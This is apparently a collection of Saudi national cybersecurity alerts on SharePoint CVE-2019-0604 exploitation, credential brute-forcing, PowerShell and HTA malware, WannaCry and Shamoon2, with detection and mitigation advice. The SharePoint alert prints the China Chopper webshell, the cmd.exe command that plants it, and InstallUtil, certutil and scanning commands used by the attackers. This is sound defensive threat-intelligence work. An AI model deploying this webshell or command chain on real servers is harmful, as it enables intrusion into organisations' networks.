Alerts


Background

In March 2019, security researchers publicly disclosed the details of an exploit CVE-2019-0604 that grants remote code execution against Microsoft SharePoint. At the time of this disclosure this exploit was not believed to have been in active use, though proof-of-concept exploit code was published later that same month. This vulnerability impacts SharePoint Server versions 2010 Service Pack 2, 2013 Service Pack 1, 2016 and 2019. A patch intended to mitigate this vulnerability has been released by Microsoft for each impacted version of SharePoint Server.

CVE-2019-0604 Exploitation Activity and Initial Compromise

In the last two weeks, NCA has observed evidence of multiple organizations that have been impacted and infected by the active exploitation of the CVE-2019-0604, a vulnerability that can grant remote code execution were the threat actors exploits this vulnerability and use the Command Prompt to implant the known China Chopper webshell. The one-liner China Chopper webshell can be seen in the below Figure:

<%@ Page Language="Jscript"%><eval(Request.Item["t"],"unsafe");%>

Figure 1: China Chopper webshell

The Threat actors through the vulnerability runs the command prompt and writes the above webshell in all available folders in the Share point server as seen in the below figure:

cmd.exe /c echo ^<%@ Page Language=" Jscript"^>^ <%eval(Request.Item ["t"], "unsafe");%^> >

"%CommonProgramFiles%Microsoft Shared\Web Server

& echo ^<%@ Page Language=" Jscript"^>^<%eval(Request.Item ["t"], "unsafe");%^> >

"%CommonProgramFiles%Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx"

Figure 2: Using the command prompt to implant China Chopper

Extensions\15\TEMPLATE\LAYOUTS\t.aspx"

As seen above, the threat actor attempts to create the webshell in multiple folders,

NCA also observed other locations and different file names that was used by the threat actors such as “/_layouts/15/stylecss.aspx”.

Establish Foothold

The threat actors utilized the webshell to install other PowerShell scripts to gain more access and establish the internal reconnaissance in the network. the first PowerShell script attempts to download other scripts and malicious files were it performs a DNS lookup shown in the below figure below:

Figure 3:DNS resolver PowerShell script

Then the threat actors download a script from “hxxps://vision2030.tk/static/googleupdate.txt” in addition to downloading other malicious files from the same domain including a new, custom, backdoor “C:\Users\Public\Libraries\KB2868493.exe”. This backdoor gets binned and opened by a PowerShell script shown below:

Figure 4: PowerShell Binder

The threat actor runs the HTTP backdoor by using InstallUtil.exe, which is a known evasion technique, that runs an executable within the parent process being a trusted windows executable (i.e. InstallUtil.exe).

 

'cmd.exe' /c C:\windows\Microsoft.NET\framework64\v4.0.30319\installutil.exe C:\Windows\syswow64\w3wwp.exe

Figure 5: CONVERTING Base64 text file to executable

Once binned and setup properly the HTTP Backdoor performs as the following:

  • • The backdoor registers an http handler to handle any requests to “hxxp://localhost:80/TEMPORARY_LISTEN_ADDRESSES/WSMAN”, other folders have been observed such as WSMAN3
  • • The backdoor handles HTTP GET requests in Json format
  • • The request cookie contains a variable named “_REGUESTGUID” that contains a base64 encoded and AES encrypted command using the AES key “JOX0UA47XOWWGONF” (128-bit) in the following format

Payload Length

IV Length

IV

Payload

4 Bytes (Int32)

4 Bytes (Int32)

IV length <Byte[]>

Payload length <Byte[]>

 

  • • The result is encoded in the same format and sent back in the response.

    The above file was recently compiled exactly one day before deploying it in the victim’s network, this shows the current and new development of these files. The below screenshot shows the compilation date and PDB string that had an identifier “nepton3”in the file:

Figure 6: Metadata of KB2868493.exe

The threat actors impersonate the legitimate Microsoft service “WSMAN” as shown in the below screenshot:

Figure 7:service name of KB2868493.exe

Another TCP backdoor was installed and utilized by the threat actors were it:

  • • beacons to 94.130.210[.]28 over TCP port 53.
  • • A scheduled task was to maintain persistence of the backdoor

Network Discovery

The threat actors then dropped a known NETBIOS scanning utility “C:\windows\temp\nbts.exe” and a port scanning tool “C:\Windows\temp\sscan.exe” to discover live hosts within the network using multiple techniques such as:

  • • Searching for open SMB ports (i.e. port 445) using “sscan.exe” and “nbts.exe”
  • • Using ARP to discover recently contacted machines.
  • • Using netstat to identify any live sessions within the compromised machine.

 

'cmd.exe' /c sscan.exe -net x.x.x.x/24 -tcp 445 -timeout 300

'cmd.exe' /c nbts.exe x.x.x.x/24

Figure 8:Usage of network scanning tools

When a targeted server is found to be reachable, the threat actors attempts to authenticate to that server using previously acquired credentials; it’s highly possible that the attacker is relying on the lack of unique passwords for Local Admin accounts within the infrastructure.

 

'cmd.exe' /c net use \\###SERVER### /u:127.0.0.1\Administrator ###PASS###

Figure 9:Verification of Local Admin Credentials

The threat actors periodically attempt to delete text, PowerShell and executable files left in the TEMP folder (C:\Windows\TEMP) to avoid detection and remain stealthy in the network, using the following commands:

'cmd.exe' /c del C:\windows\temp\*.ps1

'cmd.exe' /c del C:\windows\temp\*.txt

'cmd.exe' /c del C:\windows\temp\*.exe

Figure 10:Periodic deletion of files

The threat actor then adds new local admin accounts to the compromised machines. with a password “*******”and verifies his/her access using the following commands:

'cmd.exe' /c net user *******

'cmd.exe' /c net use \\127.0.0.1 /u:127.0.0.1\*******

 

The attackers also download text files, one of these files is named “msnb.txt”, which contains a Base64 encoded executable; the text file is then converted to an executable using certutil.exe and then delete the text file through the following commands:

‘cmd.exe' /c certutil -decode C:\windows\temp\msnb.txt C:\users\public\libraries\msnb.exe

'cmd.exe' /c del C:\windows\temp\msnb.txt

Figure 11:Converting Base64 text file to executable

It was also noted that the PowerShell script with the same name (i.e. msupdate.ps1) was executed in the environment. It was clear that the threat actors were targeting Exchange and SQL servers as multiple reconnaissance-related commands were targeted to gathering information about these two servers which shows this attack is still in its first stages.

Another technique observed used by the threat actor, is the usage of “smbtouch” which is a scanner tool used to identify machines vulnerable to MS17-010 as well as other know vulnerabilities.

Other wide spread observed activity

Since the disclosure of the PoC, NCA observed a spike in scanning activities on this specific vulnerability which indicates a rapid and quick adoption from multiple threat actors that are keen to utilize this easy and remote access to organization networks.

Outlook and amplification

NCA assesses with high confidence that exploitation activity targeting this vulnerability is likely to increase in the short term due to the following factors:

  • • It affects Microsoft SharePoint, which is internet-facing in most targets.
  • • SharePoint is integrated with the internal Active Directory, in most cases.
  • • The exploitation technique is simple and can be performed using an HTTP request.
  • • The privileges of the SharePoint accounts allow a threat actor to upload a webshell which could be used as a backdoor into the environment.
  • • Organizations may not have previously prioritized patching of vulnerabilities that were not known to be actively exploited

    Threat actors with varying motivations are often quick to weaponize PoC code following public disclosures. This swift exploitation ultimately increases the likelihood that their campaigns will be successful. Therefore, it is critical that organizations with a SharePoint installation should apply the published security updates.

Description:


The NCSC has detected lately massive malicious activities from known threat actors in order to harvest sensitive data (such as user credentials). These threat actors target organizations by brute forcing the access to exchange servers, VPN gateways, and portal services pages and obtain valid credentials.
Techniques that have been observed during this campaign include but not limited to:
•Brute force and crack a remote authentication service.
•Exploit SMB windows vulnerability.
•Tool to identify a variety of devices from a large number of known routers.
•Enumerate subdomains of websites using OSINT.
•Tool for searching through email in a Microsoft Exchange environment for specific terms.
Threat actors are using multiple IPs and c2 servers to conduct these activities:  the majority of these IPs are located inside the Kingdom of Saudi Arabia, in addition to external Virtual Private Servers located in multiple countries.

Recommendations:


1. Review the firewall/SIEM and IIS logs for any brute force activity on any internet facing services.
2.  Review access logs for any high privileged accounts and unused accounts for long periods.
3. Review the IIS servers’ files directory & sub directories for any new or modified .aspx files.
4. Review the C:\Windows\Temp for any .exe or txt files.
5. Update antivirus solutions and scan all web servers.
6. Enable the relevant access logging, that show the X-Forwarding and external IPs; on all web applications.

 

 

Description

The NCSC has detected a new Advanced Persistent Threat (APT) that is targeting Saudi Arabia. The observed malicious activities used by the threat actor, was a PowerShell based malware connects to multiple known-bad domains. The malicious PowerShell utilizes HTTP tunneling to communicate with the command and control domains. The HTTP requests and responses contains data ex-filtrated from infected machines or commands to be executed by the threat actor.
The following two techniques have been observed in the delivery and installation stages:

• Injecting Microsoft Office Documents

Most of the samples observed were Microsoft Office files containing a macro or a linked object that was delivered through spear phishing emails. Additionally, the malicious documents are sometimes compressed in a password protected RAR file to avoid mail protection mechanisms. The password is usually included in the email body.

• Accessing compromised Websites

Some samples were delivered using the watering hole or similar techniques such as cross site scripting.  The infection were observed through a compromised website “legitimate websites” where the user is redirected to a malicious website and asked to download a malicious executable. The malicious file would infect the machine with the same VBS and PowerShell scripts

Detection

To detect such malicious activates, the NCSC recommends following the below actions:
• Review Proxy logs / SIEM or NG firewalls for query strings in HTTP requests that follows the pattern below:
  *.php?c=(Base64 data) 
  *.aspx?c=(Base64 data) 
• HTTP requests to explicit IPs with no domain names
• High number of HTTP traffic going to one IP or domain.
• HTTP Connections to: 148.251.204.131 & 144.76.109.88
• Review the email gateway for emails with password protected attachments or office attachments with macros that either been blocked or alerted.
• Increase usage of PowerShell on endpoints and servers

Recommendations

It is recommended to have the following controls in order to identify and prevent similar activity:

• Upgrade to PowerShell version 5, and remove older versions.
• Enable Module Logging, Script-Block Logging and Transcript Logging in PowerShell Version 5
• Implement Application whitelisting throughout the organization, this also needs to be implemented on running PowerShell scripts. Only allow the specific scripts that you need to run, if any especially on Public facing servers.
• Prevent the execution of executables and scripts from user controlled folders, such as C:\Users\<Username> and temporary folders, such as C:\Windows\Temp
• Use email filtering to scan and block incoming email for macro-enabled documents and other malicious files such as executable, Windows Host Scripting and HTA files.
• Implement a File Integrity Monitoring (FIM) Solution on the www root all internet-facing applications, such as web applications, email and VPN portals. It’s critical to alert on any unauthorized modification to those servers, as this might indicate a successful attack.

 

Description:

The NCSC has detected new activities related to a previous campaigns where new tools and malicious files, from a known threat actor, have been observed. The observed behavior is using a new malicious HTA document. The threat actor in this wave, used an HTA file including two malicious executable files which utilize the DNS protocol as a channel for Command and Control communication.

Recommendations:

1. Prevent HTA files from being run by Software Restriction Policies or by Device Guard for Microsoft systems.
2. Change the opening program of the HTA file from the default “mshta” to notepad so that the malware will not run and instead this will be opened by Notepad.
3. Block any HTA-type attachment or file through the Email Gateway.
4. Updating operating systems continuously, especially security updates and applications.
5. Keep monitoring the mentioned IOCs.
6. Monitor DNS protocol logs.

 

As NCSC mission is to help protecting national cyber space. NCSC would like to share the following alert with you:

NCSC detect massive dump of credentials in suspicion server and NCSC recommends, as minimum:

1. Implement strict password policies, as many of the published passwords are considered weak.
2. Implement adequate security controls for any web facing authentication service. Those controls should include lockout policies and multi-factor authentication.
3. If the organization hasn’t forced users to change passwords in the last 6 months, it’s critical to perform it as soon as possible.
4. Ensure that not using any corporate email in public site.

NCSC is providing this recommendations, and it is the entity responsibility to ensure the proper fixation based on the entity infrastructure design and business needs, then apply what meets your requirements.

Description:

NCSC would like to warn all organizations in the Kingdom about a new Ransomware campaign called “WannaCry”. The“WannaCry” Ransomware massively distributed world widely starting from 12th May 2017 encrypting all files of the infected systems. The “WannaCry” Ransomware is using the MS17-010 vulnerability to distribute through the network. NCSC is working to identify infected organizations in Saudi Arabia if any, and to help protecting them as required. NCSC will provide updates as become available.

Recommendations

1. Make sure all systems has deployed Microsoft patch MS17-010
2. Please be aware that Microsoft has announced a new update on the same vulnerability (MS17-010)
for the Windows OS 2003/ XP. Please make sure to update your system accordingly.
3. Review all ports that are accessible from the internet. DISABLE/BLOCK NetBIOS & SMB ports.
(135,139 & 445) from listening to external connections.
4. Make sure you have a process and it is implemented for offline Full Backup for all critical systems/applications on backup tapes/hard drives.

 

Description:

A set of malicious tools were leaked, that exploit some of Microsoft vulnerabilities. Microsoft had already released a set of patches last month for all supported operating systems, most notably is the patch in Microsoft Security Bulletin MS17-010. It could be that many organization haven’t yet applied the patches, which may put their network at a high risk..

Recommendations:

1- Review all open port on your network and accessible from the internet. It’s highly recommended to disable NetBIOS & SMB ports (135,139 &445) from listening to external connections.
2- Immediately upgrade all servers running on non-supported operating system, i.e. Windows XP, Windows 2003, and Windows Vista. Those versions have working exploits without any patches.
3- Immediately apply the security patches specified in Microsoft’s Security Bulletin’s specified above.
4- Immediately disable any web server running on Windows Server 2003 with WebDAV enabled.
5- Immediately disable any publicly accessible RDP port running on Windows Server 2003.
6- Disable all RDP ports exposed to the internet. If there is a critical business need to enable it, then strict security controls must be enabled, such as but not limited to two-factor authentication, monitoring of incoming connections and strict password policies. Domain Admins should never have access rights for RDP access.

Description:

As NCSC mission is to help protecting national cyber space in Saud Arabia. NCSC would like to warn all organizations in the kingdom as NCSC has detected a massive phishing emails campaign that were targeting multiple organizations in the kingdom. The phishing emails is fake and has a malicious PDF file.

Recommendations:

1- Immediately delete the phishing email from the email gateway and the email mailbox (if possible).
2- Identify all systems received the phishing email.
3- Isolate the infected systems from the network.
4- Investigate the infected systems.
5- For more details refer to Alert # 1704037 (sent by email)

Security Issue:

As NCSC mission is to help protecting cyber space in the country. NCSC would like to warn all organizations in the kingdom as the center has noticed many organization were infected with destructive attacks using SHAMOON2 malware. NCSC believes other waves may come if the proper measures is not implemented. 

SHAMOON attack works as following:

1- Gathering (scan) information about the organization using multiple sources.
2- Gaining access to the network in one of the two ways: brute force or phishing emails. Repeating these steps until gaining domain admin credentials.
3- Lateral movement and access to the critical servers (domain controllers or exchange server).
4- Use PSexec.exe to distribute SHAMOON2 malware 32-bit ntermgr32.exe and a batch script ntertmgr.bat in the local \SystemRoot\Windows\System32\ folder of all reachable systems in the network
5- Scan and Manual access to the backup servers to delete the backup (if available)
6- Use PSexec.exe to run the batch script and execute SHAMOON2 malware and destruct the systems.

NCSC Recommendation:

• Please refer to NCSC RECOMMENDATION: Recent Attacks Protection and Detection Steps.

 

Security Issue:

As NCSC mission is to help protecting the national cyber space in Saud Arabia. NCSC would like to warn all organizations in the kingdom, as NCSC has detected massive outbound FTP and SSH connections from Saudi Organizations going to known bad Command & Control (C2) severs or bad reputation IPs/domains. The identified suspicious servers contain multiple suspicious executable files and other leaked documents.

Recommendation:

• Block all un-secure protocols either incoming or outgoing such as TFTP, FTP and telnet and replace them with secure protocols.
• Review any outgoing FTP and SSH traffic in the last month and investigate any abnormal behavior.